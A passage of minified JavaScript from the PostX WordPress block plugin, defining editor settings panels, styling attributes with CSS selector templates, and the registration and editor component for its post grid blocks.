Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"]}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exStyle:["imgWidth","imageScale","imgHeight","imgMargin"],exSettings:["imgCropSmall"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},75108:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},columns:{type:"object",default:{lg:"3",sm:"2",xs:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-gap: {{columnGridGap}}; }"}]},overlayHeight:{type:"object",default:{lg:"250",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-image img, \n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: {{overlayHeight}}; }"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},queryExcludeAuthor:{type:"string",default:"[]",style:[{depends:[{key:"queryAuthor",condition:"==",value:"[]"},{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]}]}]},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleTag:{type:"string",default:"h3"},titleAnimation:{type:"string",default:""},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgAnimation:{type:"string",default:"zoomOut"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay:hover"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"flat",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:10,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:5,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; } \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:" .rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},headingText:{type:"string",default:"Post Grid #2"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},paginationType:{type:"string",default:"pagination"},...(0,o.t)(["heading","advFilter","advanceAttr","pagination","video","meta","category","readMore","query"],["queryExcludeAuthor"],[{key:"queryNumber",default:"4"},{key:"pagiAlign",default:{lg:"left"}},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"readMoreColor",default:"#fff"}]),...(0,i.b)({defColor:"#fff"}),V4_1_0_CompCheck:a.O}},24484:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(67163),r=l(75108),s=l(98453);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-2/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-2.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid2.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-2")]},edit:n.Z,save:()=>null})},38219:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(87402);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useRef:E,useState:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,clientId:A,isSelected:H,attributes:N,className:j,context:Z,attributes:{blockId:O,currentPostId:R,previewImg:D,advanceId:z,paginationShow:F,paginationAjax:W,headingShow:V,filterShow:G,paginationType:q,navPosition:$,paginationNav:K,loadMoreText:J,paginationText:Y,dcFields:X,dcEnabled:Q,readMoreIcon:ee,excerptLimit:te,column:le,metaStyle:oe,metaShow:ae,catShow:ie,showImage:ne,metaSeparator:re,titleShow:se,catStyle:pe,catPosition:ce,titlePosition:ue,imgAnimation:de,imgOverlayType:me,imgOverlay:ge,metaList:ye,metaListSmall:be,showSmallCat:ve,showSmallMeta:he,readMore:fe,readMoreText:ke,overlayContentPosition:we,showSmallBtn:xe,showSmallExcerpt:Te,metaPosition:_e,showFullExcerpt:Ce,layout:Ee,titleAnimation:Se,customCatColor:Pe,onlyCatColor:Le,contentTag:Ie,titleTag:Be,showSeoMeta:Ue,titleLength:Me,metaMinText:Ae,metaAuthorPrefix:He,titleStyle:Ne,metaDateFormat:je,authorLink:Ze,excerptShow:Oe,fallbackEnable:Re,imgCropSmall:De,imgCrop:ze,vidIconEnable:Fe,notFoundMessage:We,V4_1_0_CompCheck:{runComp:Ve}}}=e,[Ge,qe]=S(w.Ti),[$e,Ke]=S(null);function Je(e){qe({...Ge,selectedDC:e})}function Ye(){qe({...Ge,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Xe(e){qe({...Ge,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),Ke("setting")}function Qe(e){qe((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function et(){Ge.error&&qe({...Ge,error:!1}),Ge.loading||qe({...Ge,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{qe({...Ge,postsList:e,loading:!1})})).catch((e=>{qe({...Ge,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),et()}),[]),C((()=>{const t=A.substr(0,6),o=B(U(A));(0,a.qi)(l,o,R,A),(0,v.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[A]),C((()=>{const e=t.current;(0,h.o6)()&&0===N.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(et(),t.current=N),e.isSelected!==H&&H&&(0,w.gT)(Xe,Qe)):t.current=N}),[N]);const tt={settingTab:$e,setSettingTab:Ke,setAttributes:l,name:M,attributes:N,setSection:Xe,section:Ge.section,clientId:A,context:Z,setSelectedDc:Je,selectedDC:Ge.selectedDC,selectParentMetaGroup:function(e){Je(e),Qe("dc_group")}};let lt;if(O&&(lt=(0,y.Kh)(N,"ultimate-post/post-grid-3",O,(0,a.k0)())),D&&!H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:D});C((()=>{H&&N.previewImg&&l({previewImg:""})}),[e?.isSelected]);const ot=_({...z&&{id:z},className:`ultp-block-${O} ${j}`,onClick:e=>{e.stopPropagation(),Xe("general"),Qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:tt,selected:Ge.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:tt})),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","wrapOuterPadding","wrapMargin","spaceSep"]},{type:"layout",block:"post-grid-3",key:"layout",options:[{img:"assets/img/layouts/pg3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pg3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pg3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pg3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid 